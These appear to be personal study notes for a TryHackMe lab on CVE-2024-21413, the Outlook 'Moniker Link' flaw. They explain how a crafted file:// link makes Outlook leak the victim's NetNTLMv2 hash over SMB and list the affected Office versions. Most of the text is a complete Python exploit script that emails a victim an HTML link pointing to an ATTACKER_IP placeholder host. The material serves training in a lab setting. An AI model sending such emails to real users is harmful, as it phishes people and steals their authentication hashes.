Moniker Link (CVE-2024-21413)

https://tryhackme.com/r/room/monikerlink

What does it do:

An unwilling victim clicks on a link in Outlook (versions affected by this shown bellow) This simple act will send the attacker the netNTLMv2 hash of the victim's

How does it work:

The link contains the address of the attacker, by clicking on it, you're initiating SMB (Server Message Block) protocol, potentially triggering an NTLMv2 authentication request. which is used for file sharing by windows, Linux etc. In simple terms, Outlook thinks you want to access files someone sent you and does what it's supposed to do.

The vulnerability is known to affect the following Office releases:

Release	Version
Microsoft Office LTSC 2021	affected from 19.0.0
Microsoft 365 Apps for Enterprise	affected from 16.0.1
Microsoft Office 2019	affected from 16.0.1
Microsoft Office 2016	affected from 16.0.0 before 16.0.5435.1001

CVE-2024-21413/exploit.py at main · CMNatic/CVE-2024-21413GitHub

'''
Author: CMNatic | https://github.com/cmnatic
Version: 1.1 | 13/03/2024
Only run this on systems that you own or are explicitly authorised to test (in writing). Unauthorised scanning, testing or exploitation is illegal.
'''

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender_email = 'attacker@monikerlink.thm' # Replace with your sender email address
receiver_email = 'victim@monikerlink.thm' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
html_content = """\
<!DOCTYPE html>
<html lang="en">
    <p><a href="file://Change_this_to_ATTACKER_IP/test!exploit">Click me</a></p>

    </body>
</html>"""

message = MIMEMultipart()
message['Subject'] = "CVE-2024-21413"
message["From"] = formataddr(('CMNatic', sender_email))
message["To"] = receiver_email

# Convert the HTML string into bytes and attach it to the message object
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)

server = smtplib.SMTP('Change_this_to_MAILSVERIP', 25)
server.ehlo()
try:
    server.login(sender_email, password)
except Exception as err:
    print(err)
    exit(-1)

try:
    server.sendmail(sender_email, [receiver_email], message.as_string())
    print("\nEmail delivered")
except Exception as error:
    print(error)
finally:
    server.quit()